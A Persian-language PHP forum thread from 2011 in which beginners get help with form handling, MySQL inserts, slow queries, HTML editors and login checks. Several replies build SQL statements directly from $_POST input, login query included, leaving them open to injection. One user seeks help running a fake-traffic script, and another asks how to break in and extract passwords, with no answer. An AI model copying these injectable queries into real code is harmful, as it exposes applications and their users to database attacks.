</select>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; شهرستان :
<select id="Shahrestan" name="shahr" runat="server" >
</select>
<br/>
<input type="submit" name="s" value"print" />
&nbsp;
&nbsp;</p>
</div>
</form>
</body>
</html>

Sil3nt Di3
12-08-2011, 12:48 PM
سلام دوست عزیز...

شما بعد از اینکه اطلاعات فرم رو ارسال کردید برای پردازش با متد post باید با استفاده از متغیر سراسری post اون رو در دیتا بیس قرار بدید..

مثلا شما اسم برای <select< انتخاب نکردی باید یک نام بزاری تا بتونی ازش استفاده کنی:


<select name="shahr">

برای پردازش اون هم بصورت زیر باید عمل کنی:


$shahr=$_POST['shahr'];

که بدین صورت مقدرا vlue در option ها رو پس از انجام عملیات بانک اطلاعاتی در جدول قرار میده...

موفق باشی...

notron
12-08-2011, 06:34 PM
اين چه كدي است؟

ORMAZD
12-08-2011, 06:51 PM
phpهستش.
بله

notron
12-08-2011, 07:03 PM
اين را از cpanel سايتم از قسمت index.php برداشتم ميخوام ويرايش كنم و يه كد براي منوي بالاي سايتم بزارم دقيقا بايد كجا بزارم؟

u0il
12-09-2011, 12:28 AM
لینک کاملا سالمه. لطفا دیگران هم نظرشونو بگن تا دیگه spam ندن بعضی ها.
هرچند احتیاج به تشکر ندارم اما تشکر نشانه ی رضایت شماست .موفق باشید.

adc
12-09-2011, 08:30 AM
سلام من هر کار می کنم درست نمی شه این کد من هست

$result = mysql_query("select * from p_players LIMIT 0 ,".$row1 ,$db);
if (!$result) {
die( 'Could not query:' . mysql_error( ));
}
for($k=0;$k<=$row-1;$k++)
{
if(mysql_result($result,$k,"name")==$fname)
$sh=1;

}

{
$q=$row-1;
for($g=0;$g<=$q;$g++)
{
if(mysql_result($result,$g,"name")==$fname)
{

$gasd2=mysql_result($result,$g,"villages_id");
//echo $gasd2."<br>";
$gasd=explode(",",$gasd2);
foreach($gasd as $str2)
{
echo $str2."=>";
if($str2<105 && $omad==0)
{
$omad=1;
$result9 = mysql_query("select * from p_villages LIMIT 0 , 105" ,$db);
if (!$result9) {
die( 'Could not query:' . mysql_error( ));
}
//if(mysql_result($result9,$str2,"buildings") != Null)
{
//if(mysql_result($result9,$str2,"player_name")==$fname)."<br>"
for($zir=0;$zir<=105;$zir++)
{
echo "<br>".( mysql_result($result9,$zir,"id") )."<br>";


//if($ng==mysql_result($result9,$zir,"id"))
//{
//echo "============><font color=green>TRUE<font color=black> <br>";
//}
//else{
//echo "=><font color=red>FALSE<font color=black> <br>";
//}

Goback
12-09-2011, 11:03 AM
سلام من هر کار می کنم درست نمی شه این کد من هست


1-سوالتون مربوط به موضوع بالایی هست؟یا یه بحث دیگه ست؟
2-این کد باید چیکار کنه؟خطاش چیه؟یه کم توضیح بدید.

adc
12-09-2011, 03:19 PM
خوب می گم کد من هر کار می کنم هر تغییری ایجاد می دم باز هم کند هست خیلی طول می کشه تا پیداکنه


من می خوام یک ID را در یک table در بخش ID جتجو کنه من هر کار می کنم طول می کشه

ماله همین موضوع هست کد جستوجوی سریع در دیتابیس با ۶۰۰ هزار rows درخواست فوری

adc
12-09-2011, 07:56 PM
کسی نیست مارا یاری نماید؟؟

Goback
12-09-2011, 08:26 PM
کسی نیست مارا یاری نماید؟؟

پست بی مورد ندید لطفا.

خوب می گم کد من هر کار می کنم هر تغییری ایجاد می دم باز هم کند هست خیلی طول می کشه تا پیداکنه


من می خوام یک ID را در یک table در بخش ID جتجو کنه من هر کار می کنم طول می کشه

ماله همین موضوع هست کد جستوجوی سریع در دیتابیس با ۶۰۰ هزار rows درخواست فوری
ببینید دوست عزیز،وقتی من لینکی به شما میدم یعنی چی؟یعنی باید برید بخونید،حتما جوابتون توی لینک بوده که ارجاع داده شده.
کوئری و کدزنیتون اشکالات بهینه ای داره.
علاوه بر لینک قبلی به این لیتک هم سر بزنید:

[Only registered and activated users can see links]

هر دو لینک بهینه ای و واجبه.
لینک اولی که داده شد در مورد جستجوری FULL TEXT بود،و لینک دوم در مورد استفاده از LIMIT ، بعد از اینکه هر دو رو خوندید،اعمال کنید،انشاءالله مشکلتون حل میشه.

adc
12-09-2011, 09:04 PM
فقط این لاین ۲ مین طول می کشه علت چیست؟؟

$result9 = mysql_query("select * from p_villages LIMIT 0,600000" ,$db);

l.messi
12-10-2011, 10:29 AM
با سلام خدمت دوستداران زبان php

ببخشید دوستان من یه سوال داشتم :

ببینید :

مثلن من میخوام یه سایت رو طراحی کنم ، خوب ! من اولین کاری که باید بکنم اینه ، که یه صفحه تو کنترل پنل ایجاد کنم تا کاربر بتونه متن دلخواهش رو تو صفحه ی اصلی سلیا اضافه کنه!

درسته؟

میخواستم ببینم چه جوری میشه این کار رو کرد!

مثل همین جا که مثلن برای ایجاد تاپیک دیدید، وسط چین ، بلد کردن متن ، آپلود عکس و ... (کارایی که برای ارسال متن باید کرد!)

ممنون میشم کامل توضیح بدید!

با تشکر

Goback
12-10-2011, 11:02 AM
فقط این لاین ۲ مین طول می کشه علت چیست؟؟

$result9 = mysql_query("select * from p_villages limit 0,600000" ,$db);

چون از سطر اول تا سطر 60هزارم رو میخواد یک دفعه بخونه،اونم رو دیتابیسی که بهینه نیست،اصلا این درخواست درست نیست،فشار زیادی به منابع میاره،من نمیدونم چرا با اینکه جوابتون توی لینکهایی که دادم هست،ولی چرا نمیرید بخونید،مشکلی دارید با لینکها؟

joyeroshan
12-10-2011, 11:44 AM
با سلام خدمت دوستداران زبان php

ببخشید دوستان من یه سوال داشتم :

ببینید :

مثلن من میخوام یه سایت رو طراحی کنم ، خوب ! من اولین کاری که باید بکنم اینه ، که یه صفحه تو کنترل پنل ایجاد کنم تا کاربر بتونه متن دلخواهش رو تو صفحه ی اصلی سلیا اضافه کنه!

درسته؟

میخواستم ببینم چه جوری میشه این کار رو کرد!

مثل همین جا که مثلن برای ایجاد تاپیک دیدید، وسط چین ، بلد کردن متن ، آپلود عکس و ... (کارایی که برای ارسال متن باید کرد!)

ممنون میشم کامل توضیح بدید!

با تشکر

با سلام خدمت شما دوست عزیز
اولا اینکه شما باید template سایتتو design کنی بعدش به فکر سوار کردن یک cms دستساز خودت باشی اینی که شما می گی به حرف سادس اما از چندید بخش تشکیل شده شما باید یه فایل ایجاد کنی که بتونی لوگین کنی و بتونی با یه ادیتور مناسب متنتو ارسال کنی برای اینکه سایتت از حالت استاتیک در بیاد نیاز هستش که کار با php و mysql خوب بلد باشی

Sil3nt Di3
12-10-2011, 10:47 PM
سلام دوست عزیز
برای اینکه بتونید یه ویرایش گر داشته باشید که بتونید به راحتی متن رو ویرایش کنید باید از ویرایشگرهای قدرمند نظیر htmlarea استفاده کنید...

موفق باشید...

l.messi
12-11-2011, 09:01 AM
با تشکر!

دوست عزیز منظور من همین ادیتور ها هست که میگید!

یعنی مثلن دیدید موقعی که میخواید یه پست بدید تو آشیانه یا بلوگفا یا ...

اول باید متنتون رو آماده کنید ( بلد سازی ، نوع فونت ، آپلود عکس و ...)
خوب منظور من هم همچنین چیزی است!

من با php کار کردم! ولی با این ادیتور ها نه! :cool:

ممنون میشم بهترین این ها رو معرفی و برای دانلود بزارید!

راستی این ابزار پولی هست؟ یا رایگان؟ :91:

با تشکر

Sil3nt Di3
12-11-2011, 04:48 PM
این ابزاری که گذاشتم رایگان هست و از بهترین هاست

l.messi
12-12-2011, 09:15 AM
این ابزاری که گذاشتم رایگان هست و از بهترین هاست

بازم ممنون!

ولی منظورتون کدوم ابزار هست؟؟؟؟ (من که چیزی نمی بینم) :cool:

راستی داداش ، اگه یه لطف کنی و بعد از گذاشتن بهترین ادیتور برای استفاده که فارسی رو هم ساپورت کنه، ممنون میشم طرز استفاده از اون رو هم بگید!

ممنون از لطفتون!

با تشکر از مدیر عزیز

Sil3nt Di3
12-12-2011, 04:37 PM
لینک صفحه برای دانلود:

[Only registered and activated users can see links]

کد زیر رو در هدر قرار دهید:

<script type="text/javascript">
_editor_url = '/admin/htmlarea/';
_editor_lang = 'en';
</script>
<script type="text/javascript" src="htmlarea/htmlarea.js"></script>
<script type="text/javascript" src="htmlarea/dialog.js"></script>
<script type="text/javascript" src="htmlarea/lang/en.js"></script>
<script type='text/javascript' defer='1'>
HTMLArea.replaceAll();
</script>

و در تگ body عبارت زیر را اضافه نمایید:

onLoad="HTMLArea.replaceAll()"

نکته بعد اینکه در این قسمت باید آدرس ادیتور رو وارد کنید:

_editor_url = '/admin/htmlarea/';

نکته ای که باید اضفه کنم اینه که توی خودش کامل توضیح داده چیکار کنید...

موفق باشی

noblea&a
12-12-2011, 10:26 PM
سلام دوست عزیز...

شما بعد از اینکه اطلاعات فرم رو ارسال کردید برای پردازش با متد post باید با استفاده از متغیر سراسری post اون رو در دیتا بیس قرار بدید..

مثلا شما اسم برای <select< انتخاب نکردی باید یک نام بزاری تا بتونی ازش استفاده کنی:


<select name="shahr">

برای پردازش اون هم بصورت زیر باید عمل کنی:


$shahr=$_post['shahr'];

که بدین صورت مقدرا vlue در option ها رو پس از انجام عملیات بانک اطلاعاتی در جدول قرار میده...

موفق باشی...

خیلی ممنون
اما میشه یکم ساده تر بگید من خیلی مبتدی ام

Sil3nt Di3
12-13-2011, 12:47 AM
همونطور که می دونی برای استفاده از اطلاعات فرم باید با استفاده از متدی که گذاشتی در تگ فرم اولیه مثلا post یا get و اسم اون شی یا تگ فرم اطلاعات رو پردازش کنی...


<form id="form1" name="FRM" runat="server" action="" method="post" >

متد بالا پست هست...


<select id="Ostan" runat="server" onchange="Func(this.value)"<?php $ali=Ostan; echo ali;?>>

اما برای تگ select نام انتخاب نکردی... یه نام براش انتخاب کن و با استفاده از این نام و متد از اطلاعات داخل فرم استفاده کن:


$_POST['name']

اینم توضیح ساده تر

l.messi
12-13-2011, 09:18 AM
لینک صفحه برای دانلود:

[Only registered and activated users can see links]

کد زیر رو در هدر قرار دهید:

<script type="text/javascript">
_editor_url = '/admin/htmlarea/';
_editor_lang = 'en';
</script>
<script type="text/javascript" src="htmlarea/htmlarea.js"></script>
<script type="text/javascript" src="htmlarea/dialog.js"></script>
<script type="text/javascript" src="htmlarea/lang/en.js"></script>
<script type='text/javascript' defer='1'>
HTMLArea.replaceAll();
</script>

و در تگ body عبارت زیر را اضافه نمایید:

onLoad="HTMLArea.replaceAll()"

نکته بعد اینکه در این قسمت باید آدرس ادیتور رو وارد کنید:

_editor_url = '/admin/htmlarea/';

نکته ای که باید اضفه کنم اینه که توی خودش کامل توضیح داده چیکار کنید...

موفق باشی

داداش خیلی خیلی ممنون که جواب میدید!

ببخشید دوست عزیز اگه جسارت نباشه ، من هنوز چند تا سوال داشتم : :ii

1- اون قسمتی که قرمز رنگ هست رو باید کجا قرار بدم؟ توی تگ بادی؟

2- من چه جوری از این ادیتور میتونم برای ارسال مطلب کاربران سایتم به سایتم استفاده کنم!

یعنی من الان یه کنترل پنل باز بان php ساختم! خوب ، حالا میخوام یه بخش اضافه کنم به اسم : مثلن اخبار
و از این ادیتور برای ارسال و ویرایش اخبار استفاده کنم!
مگه نباید برای این کار وصل به پایگاه داده شد؟ آیا این ادیتور قادر به انجام چنین کاری است؟؟؟

3- راستی : یه نگاه هم به این تاپیک بنداز داداش :

[Only registered and activated users can see links]

بازم تشکر و قدردانی از شما مدیر عزیز! thumbsup

Sil3nt Di3
12-13-2011, 03:48 PM
1- اون قسمت رو باید در تگ header بزاری

2- هیچ کار خاصی نداره شما درواقع با این ادیتور textbox رو تبدیل به ادیتور می کنی... همونطور که اطلاعات یه تکست باکس رو میریزی در دیتابیس اینم همونه...

3- پاسخ داده شد...

خود کد راهنمای استفاده داره اگه بخونی راحت می تونی باهاش کار کنی...

موفق باشی...

fr@nki
12-13-2011, 09:34 PM
فقط این لاین ۲ مین طول می کشه علت چیست؟؟

$result9 = mysql_query("select * from p_villages LIMIT 0,600000" ,$db);
این چیزی که من می بینم باید هم طول بکشه چون شما گفتید تمام 600 هزار رکورد رو دریافت کن و این زمانبره
در مورد جستجو خوب شما می تونید فیلد مثلا ID رو تبدیل به یک Index کنید تا در ججستجو هایی که روی اون انجام می دهید در زمان صرفه جویی کنید
اگر احتمالا کد نویسی Sql رو این حد نمی دونید می تونید نرم افزار هایی مثل Heidi Sql را نصب کنید تا بصورت دیداری و ویزاردی این کار رو بکنید

Partizan
12-14-2011, 05:22 PM
سلام،
هاست من روی سرورهایی قرار داره که اجازه استفاده از CHMOD755 به بالا رو برای دایرکتوریها به من نمی ده ، من می خوام از اسکریپت EZ FAKE TRAFFIC MAKER روی هاستم استفاده کنم، ولی مشکل اینجاست که این اسکریپت از تابع fopen استفاده می کنه که اونم نیازمند داشتم دسترسی 777 برای دایرکتوری مقصد هست خواهش می کنم دوستان کمکم کنن
لازم به ذکره روی سرور suphp هم نصبه و با permission های 755 مثل 777 تحت یوزر خودم کار می کنه واسه همین با جوملا و این چیزا دردسر ست کردن دسترسی ها رو ندارم و از این حیث راحتم .
معذرت می خوام طولا نی نوشتم
من اسکریپت رو هم پیوست می کنم
ممنون یه دنیا
اینم اون قسمت کد:

$mp=@fopen("catch/$tmp.txt","c+");
@fwrite($mp,"$url");
@fwrite($mp,"|#*~!*|");
@fwrite($mp,"$rurl");
@fwrite($mp,"|#*~!*|");
@fwrite($mp,"$notify");
@fwrite($mp,"|#*~!*|");
@fwrite($mp,"$maximum");
@fwrite($mp,"|#*~!*|");
@fwrite($mp,"$iplist");
@fwrite($mp,"|#*~!*|");
@fwrite($mp,"$blist");
@fwrite($mp,"|#*~!*|");
@fwrite($mp,"$method");
@fwrite($mp,"|#*~!*|");
if($method=="post"){
for($i=1;$i<=20;$i++){
if(strlen($text[$i])>=1){
@fwrite($mp,$text[$i]."=".$val[$i]."&");
}
}
@fwrite($mp,"|#*~!*|");
}
@fclose($mp);

Sil3nt Di3
12-14-2011, 11:14 PM
سلام دوست عزیز
همانطور که خود شما هم ذکر کردید برای استفاده از این تابع باید پرم پوشه در بالاترین سطح دسترسی باشه چون شما برای کار بروری فایل ها و فولدر ها معمولا با یوزر سایت یا apache فعالیت می کنید که سطح دسترسی مربوط به آخرین قسمت هست و باید 777 باشد...
پیشنهاد اینه که از یه جا هاست بگیرید که این قبیل مشکلات نباشه... هاست های خوب زیاد هست... می تونید با شرکت آشیانه تماس بگیرید یا اینکه بهم پیام خصوصی بدید تا هاست آشیانه بهتون بدم...

موفق باشید...

noblea&a
12-14-2011, 11:23 PM
همونطور که می دونی برای استفاده از اطلاعات فرم باید با استفاده از متدی که گذاشتی در تگ فرم اولیه مثلا post یا get و اسم اون شی یا تگ فرم اطلاعات رو پردازش کنی...


<form id="form1" name="FRM" runat="server" action="" method="post" >

متد بالا پست هست...


<select id="Ostan" runat="server" onchange="Func(this.value)"<?php $ali=Ostan; echo ali;?>>

اما برای تگ select نام انتخاب نکردی... یه نام براش انتخاب کن و با استفاده از این نام و متد از اطلاعات داخل فرم استفاده کن:


$_POST['name']

اینم توضیح ساده تر

ببخشید متوجه شدم اما انکه کد نوشتن تو دیتا بیس نیست؟
اگه میشه اونو بزارید لطفا
اسم دیتا بیسم bargo
و اسم جدول test
و اسم فیلد ها shahr,Ostan
ممنون از زحمات بی پایانتون

abadis
12-14-2011, 11:33 PM
عزیزم دقیق بگو چی می خوای تا برات کامل بگم؟
از پایگاه بخوانی یا بنویسی؟یا چی؟

abadis
12-14-2011, 11:47 PM
دقیقا بگو چی می خوای تا برات کدش رو بذارم 3 سوت

noblea&a
12-14-2011, 11:52 PM
دقیقا بگو چی می خوای تا برات کدش رو بذارم 3 سوت

من این کد رو دارم




<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "[Only registered and activated users can see links]">

<html xmlns="[Only registered and activated users can see links]">


<head runat="server">
<title>Untitled Page</title>

**********
function Func(Shahrestanha) {
var _Shahrestan = document.getElementById("Shahrestan");
_Shahrestan.options.length = 0;
if(Shahrestanha != "") {
var arr = Shahrestanha.split(",");
for(i = 0; i < arr.length; i++) {
if(arr[i] != "") {
_Shahrestan.options[_Shahrestan.options.length]=new Option(arr[i],arr[i]);
}
}
}
}



</script>

</head>
<body>
<form action="prosses.php" method="post" name="FRM" id="form1" >


<div dir="rtl" style="text-align: center" >
استان :&nbsp;
<select id="Ostan"select name="Ostan"runat="server" onchange="Func(this.value)">
<option value=""></option>
<option value=" ,آذرشهر ,اسکو ,اهر ,بستان*آباد ,بناب ,تبریز ,جلفا ,چاراویماق ,سراب ,شبستر ,عجب*شیر ,کلیبر ,مراغه ,مرند ,ملکان ,میانه ,ورزقان ,هریس ,هشترود">آذربایجان شرقی</option>
<option value=" ,ارومیه ,اشنویه ,بوکان ,پیرانشهر ,تکاب ,چالدران ,خوی ,سردشت ,سلماس ,شاهین*دژ ,ماکو ,مهاباد ,میاندوآب ,نقده">آذربایجان غربی</option>
<option value=" ,اردبیل ,بیله*سوار ,پارس*آباد ,خلخال ,کوثر ,گِرمی ,مِشگین*شهر ,نَمین ,نیر">اردبیل</option>
<option value=" ,آران و بیدگل ,اردستان ,اصفهان ,برخوار و میمه ,تیران و کرون ,چادگان ,خمینی*شهر ,خوانسار ,سمیرم ,شهرضا ,سمیرم سفلی ,فریدن ,فریدون*شهر ,فلاورجان ,کاشان ,گلپایگان ,لنجان ,مبارکه ,نائین ,نجف*آباد ,نطنز">اصفهان</option>
<option value=" ,آبدانان ,ایلام ,ایوان ,دره*شهر ,دهلران ,شیروان و چرداول ,مهران">ایلام</option>
<option value=" ,بوشهر ,تنگستان ,جم ,دشتستان ,دشتی,دیر ,دیلم ,کنگان ,گناوه">بوشهر</option>
<option value=" ,اسلام*شهر ,پاکدشت ,تهران ,دماوند ,رباط*کریم ,ری ,ساوجبلاغ ,شمیرانات ,شهریار ,فیروزکوه ,کرج ,نظرآباد ,ورامین">تهران</option>
<option value=" ,اردل ,بروجن ,شهرکرد ,فارسان ,کوهرنگ ,لردگان">چهارمحال و بختیاری</option>
<option value=" ,بیرجند ,درمیان ,سرایان ,سربیشه ,فردوس ,قائنات,نهبندان">خراسان جنوبی</option>
<option value=" ,بردسکن ,تایباد ,تربت جام ,تربت حیدریه ,چناران ,خلیل*آباد ,خواف ,درگز ,رشتخوار ,سبزوار ,سرخس ,فریمان ,قوچان ,کاشمر ,کلات ,گناباد ,مشهد ,مه ولات ,نیشابور">خراسان رضوی</option>
<option value=" ,اسفراین ,بجنورد ,جاجرم ,شیروان ,فاروج ,مانه و سملقان">خراسان شمالی</option>
<option value=" ,آبادان ,امیدیه ,اندیمشک ,اهواز ,ایذه ,باغ*ملک ,بندر ماهشهر ,بهبهان ,خرمشهر ,دزفول ,دشت آزادگان ,رامشیر ,رامهرمز ,شادگان ,شوش ,شوشتر ,گتوند ,لالی ,مسجد سلیمان,هندیجان ">خوزستان</option>
<option value=" ,ابهر ,ایجرود ,خدابنده ,خرمدره ,زنجان ,طارم ,ماه*نشان">زنجان</option>
<option value=" ,دامغان ,سمنان ,شاهرود ,گرمسار ,مهدی*شهر">سمنان</option>
<option value=" ,ایرانشهر ,چابهار ,خاش ,دلگان ,زابل ,زاهدان ,زهک ,سراوان ,سرباز ,کنارک ,نیک*شهر">سیستان و بلوچستان</option>
<option value=" ,آباده ,ارسنجان ,استهبان ,اقلید ,بوانات ,پاسارگاد ,جهرم ,خرم*بید ,خنج ,داراب ,زرین*دشت ,سپیدان ,شیراز ,فراشبند ,فسا ,فیروزآباد ,قیر و کارزین ,کازرون ,لارستان ,لامِرد ,مرودشت ,ممسنی ,مهر ,نی*ریز">فارس</option>
<option value=" ,آبیک ,البرز ,بوئین*زهرا ,تاکستان ,قزوین">قزوین</option>
<option value=" ,قم">قم</option>
<option value=" ,بانه ,بیجار ,دیواندره ,سروآباد ,سقز ,سنندج ,قروه ,کامیاران ,مریوان">کردستان</option>
<option value=" ,بافت ,بردسیر ,بم ,جیرفت ,راور ,رفسنجان ,رودبار جنوب ,زرند ,سیرجان ,شهر بابک ,عنبرآباد ,قلعه گنج ,کرمان ,کوهبنان ,کهنوج ,منوجان">کرمان</option>
<option value=" ,اسلام*آباد غرب ,پاوه ,ثلاث باباجانی ,جوانرود ,دالاهو ,روانسر ,سرپل ذهاب ,سنقر ,صحنه ,قصر شیرین ,کرمانشاه ,کنگاور ,گیلان غرب ,هرسین">کرمانشاه</option>
<option value=" ,بویراحمد ,بهمئی ,دنا ,کهگیلویه ,گچساران">کهگیلویه و بویراحمد</option>
<option value=" ,آزادشهر ,آق*قلا ,بندر گز ,ترکمن ,رامیان ,علی*آباد ,کردکوی ,کلاله ,گرگان ,گنبد کاووس ,مراوه*تپه ,مینودشت">گلستان</option>
<option value=" ,آستارا ,آستانه اشرفیه ,اَملَش ,بندر انزلی ,رشت ,رضوانشهر ,رودبار ,رودسر ,سیاهکل ,شَفت ,صومعه*سرا ,طوالش ,فومَن ,لاهیجان ,لنگرود ,ماسال">گیلان</option>
<option value=" ,ازنا ,الیگودرز ,بروجرد ,پل*دختر ,خرم*آباد ,دورود ,دلفان ,سلسله ,کوهدشت">لرستان</option>
<option value=" ,آمل ,بابل ,بابلسر ,بهشهر ,تنکابن ,جویبار ,چالوس ,رامسر ,ساری ,سوادکوه ,قائم*شهر ,گلوگاه ,محمودآباد ,نکا ,نور ,نوشهر">مازندران</option>
<option value=" ,آشتیان ,اراک ,تفرش ,خمین ,دلیجان ,زرندیه ,ساوه ,شازند ,کمیجان ,محلات">مرکزی</option>
<option value=" ,ابوموسی ,بستک ,بندر عباس ,بندر لنگه ,جاسک ,حاجی*آباد ,شهرستان خمیر ,رودان ,قشم ,گاوبندی ,میناب">هرمزگان</option>
<option value=" ,اسدآباد ,بهار ,تویسرکان ,رزن ,کبودرآهنگ ,ملایر ,نهاوند ,همدان">همدان</option>
<option value=" ,ابرکوه ,اردکان ,بافق ,تفت ,خاتم ,صدوق ,طبس ,مهریز ,مِیبُد ,یزد">یزد</option>
</select>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; شهرستان :
<select id="Shahrestan" name="shahr"runat="server" >
</select>
<br/>
<input type="submit" name="s" value"print" />
&nbsp;
&nbsp;</div>
</form>
</body>
</html>




و در صفحه prosses.php

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "[Only registered and activated users can see links]">
<html xmlns="[Only registered and activated users can see links]">
<head>
<meta [Only registered and activated users can see links]"Content-Type" content="text/html;
charset=utf-8"/>
<title>Untitled Document</title>
</head>
<?php
$uname=trim($name);
//لوکال هاست شما
$Host="localhost";
// نام کاربری بانک اطلاعاتی
$User="root";
// کلمه عبور بانک اطلاعاتی
$Password="";
// نام بانک اطلاعاتی
$Dbname="bargo";

// نام جدول ساخته شده در بانک اطلاعاتی
$Tablname="test2";
$Link= mysql_connect($Host,$User,$Password);
$Query="INSERT into $Tablname values ('$_POST[shahr]')";

if (mysql_db_query($Dbname,$Query,$Link)) {

print("اطلاعات ثبت شد ");
} else {
print("خطا در ثبت اطلاعات");
}
?>
<body>
</body>
</html>
اما تو دیتا بیس اجق وجق می افته فارسی نمی افته

abadis
12-15-2011, 12:18 AM
اوکی
اول پایگاهتو
utf8-persian-ci
بساز
بعد سایتت رو هم رو
utf8
بذار
بعد این فوت کوزه گری هم داشته باش
قبل از عبارت های اینسرت یه
n
بذار حله
اینطوری
insert into felan(felan,felan)values(N'felan',N'felan')
برا شما میشه
$Query="INSERT into $Tablname values (N'$_POST[shahr]')
ببین حل شد تشکر یادت نره

noblea&a
12-15-2011, 10:20 AM
سلام دوستان
1 فرم ثبت نام کامل لازم دارم با توضیحات اگه میشه بزارین
با action کار کنه
و صحت اطلاعات رو چک کنه
نشکر!

Sil3nt Di3
12-15-2011, 04:15 PM
سلام دوست عزیز اینم یه فرم ثبت نام کامل و زیبا همراه با توضیح:

Partizan
12-15-2011, 07:38 PM
با سپاس شما هرگز سوالی رو بی جواب نذاشتید، ممنونم.
متاسفانه هاست 3 ساله گرفته بودم که هنوز 2 ساله دیگه ازش مونده
شرکتش هم hostgator هست تنها مشکلم باهاشون همینه ، من یه سرچی کردم دیدم می شه واسه حل مشکل به اون فایل و پوشه دست رسی apache رو داد تا اینطوری مشکلی تحت یوزر ftp نداشته باشه
من به SSH دست رسی دارم ، آیا می تونم چنین کاری بکنم که این دایرکتوری و فایل موقت داخلش هروقت ایجاد می شه owner آپاچی داشته باشه

chown apache:apache catch/$tmp.txt

جدای از این سوال آیا می شه به جای fopen این رو با یه تابه دیگه نوشت
آیا می شه با curl نوشته بشه اگه می شه ممکنه خواهش کنم دوباره این قطعه کد رو تحت اون تابع برام بازنویسی کنید
خب اون وقت تکلیف fwrite چی میشه
یا می شه کد رو طوری تغییر داد که فایلی که به طور موقت ایجاد می کنه تحت یوزر آپاچی باشه اینطوری دست رسی اذیت نمی کنه فکر کنم
فقط یه مسئله ای این فایل موقتی که با پسوند txt ایجاد می شه اسمش متغییره می شه کاری کرد که همه فایل های تکست داخل یه دایرکتوری که ایجاد خواهند شد شامل این داستان بشند
مثلا با این کدی شبیه به این
exec("chown apache:apache catch/$tmp.txt"); البته احتمال خیلی زیاد من اشتباه نوشتم، چون اسم فایل متغیره فکر می کنم اینطوری بشه حلش کرد، گیج شدم :33: کمک نمی فهمم :60:
ببخشید زیاد سوال پرسیدم

noblea&a
12-15-2011, 09:31 PM
سلام
یه کد javascript یا jquery یا هرچیزی می خوام که بشه باهاش تکراری بودن یوزر نیم رو چیک کرد
نمی خوام توسط سرور پردازش بشه
تو خود صفحه ثبت نام
به طوری که کد رو تو onchange فیلدم فراخوانی کنم

Sil3nt Di3
12-15-2011, 11:37 PM
ببینید دوست عزیز اینی که شما میگید نمیشه پرم دادرو من تا حالا ندیدم ولی فرض رو بر این میگیرم که یه همچین چیزی رو ادمین کرده چون هیچی بعید نیست و قطعا ادمین دیتاسنتر یه چیزیش میشه یا اینکه مشکل داره چون اکثر cms های دنیا برای اجرا شدن به پوشه tmp با پرم 777 نیاز دارند یا حتی برای اپلود کردن... و این یعنی اینکه هیچکس نمیتونه با این هاست ها کاری کنه...
وظیفه ادمین سرور هست که این مشکل شما رو حل کنه و این کارش غیر قانونی هست
یه تیکت بزنید به ادمین سرور و درخواست کنید... چون پرم 777 یه جورایی برای جاهایی حیاطی هست...

دراخر اینکه یه تست بزنید ببینید با ssh نمی شه chmod کرد..

موفق باشید...

Sil3nt Di3
12-15-2011, 11:39 PM
سلام دوست عزیز شما با اجاکس یه همچین کاری می تونی بکنی ولی اینکه با جاوا اسکریپت انجام بدی نه... چونکه اطلاعات رو باید از دیتابیس بخونه و چک کنه ببینه توی دیتا بیس هست یا نه... پس با جاوا نمیشه همچین کاری کرد...

بدنبال استفاده از اجاکس باشید...

موفق باشی...

soket
12-16-2011, 05:22 AM
سلام دوست عزیز شما با اجاکس یه همچین کاری می تونی بکنی ولی اینکه با جاوا اسکریپت انجام بدی نه... چونکه اطلاعات رو باید از دیتابیس بخونه و چک کنه ببینه توی دیتا بیس هست یا نه... پس با جاوا نمیشه همچین کاری کرد...

بدنبال استفاده از اجاکس باشید...

موفق باشی...
من میخوام نفوذ کنم و یوزر پسوورد رو در بیارم نه اینکه مقابله کنم any body help me ?

Goback
12-16-2011, 06:46 AM
اوکی
بعد این فوت کوزه گری هم داشته باش
قبل از عبارت های اینسرت یه
n
بذار حله

n برای چی؟
مشکل چی بوده که حله؟

mrsoroush
12-17-2011, 06:28 PM
با سلام، این سوال شاید ابتدایی باشه اما خواهش میکنم اگه میتونید جواب بدید
من یه فرم login دارم با دوفیلد به نامهای username و password. کاربر این دو فیلد رو پر میکنه و اگه داخل دیتابیس username و passwordی که وارد کرده موجود باشه وارد سایت میشه. اطلاعات با موفقیت به یه صفحه php ارسال میشه، اونجا ارتباط با دیتابیس با موفقیت برقرار میشه اما
میشه بگید چطوری میتونم بررسی کنم که آیا این دو فیلد در دیتابیس موجود هستند یا خیر؟
در واقع در دستور SELECT * from mytable WHERE condition بجای condition چه شرایطی باید قرار بدم؟
mytable جدولی در دیتابیس با دو ستون username و password است

CR9
12-17-2011, 07:37 PM
سلام


$query = "SELECT * FROM `mytable` WHERE `username` = '$username' AND `password` = '$password'
";

موفق باشید ./

mrsoroush
12-17-2011, 08:50 PM
ممنون
ولی من خودمم همینو نوشته بودم و فکر میکنم راه روتین هم همین باشه. اما من چه نام کاربری و رمز عبوری که تو دیتابیس هست و چه نام کاربری و رمز عبوری که نیست رو بهش بدم جواب مثبت میده! درواقع هرچی بهش بدی میگه «شما با موفقیت وارد شدید»!
آقا اینم کد من. شاید ایرادی داره که من نمیدونم:



if (isset($_POST)){
$username = $_POST['username'];
$password = $_POST['password'];
}
$conn = mysql_connect('localhost', 'root', '');
if (!$conn)
die ("couldnt conected to database:" . mysql_error());

mysql_select_db('work' , $conn) or die ("couldn't open this db:" . mysql_error());
$result = mysql_query("SELECT * FROM userpass WHERE
'username' = '$username
AND
'password = '$password'
AND
'mail' = '*'
" , $conn);

if($result)
print "yes";
else print "no";


توضیح: work اسم دیتابیس و userpass اسم جدول موردنظر است.
این جدول سه ستون به اسمهای username و password و email دارد.
با تشکر

CR9
12-17-2011, 09:55 PM
در واقع اشتباه شما اینه که میرید مقدار $result رو چک میکنید !
درسته به $result یه مقداری داده میشه اما شما نباید بری مقدار $result خالی رو چک کنی باید بوسیله ی mysql_num_rows() تعداد ردیف های بدست آمده از $result بررسی کنی که اگر 1 یا هر عددی غیر از صفر بود یعنی پیدا شده اگر هم صفر بود یعنی یافت نشده !

اینم کد تصحیح شده :

<?php
$username = "cr9";
$password = "12";
$conn = mysql_connect('localhost', 'root', '') or die("Connection error");
mysql_select_db('grant' , $conn) or die ("couldn't open this db:" . mysql_error());
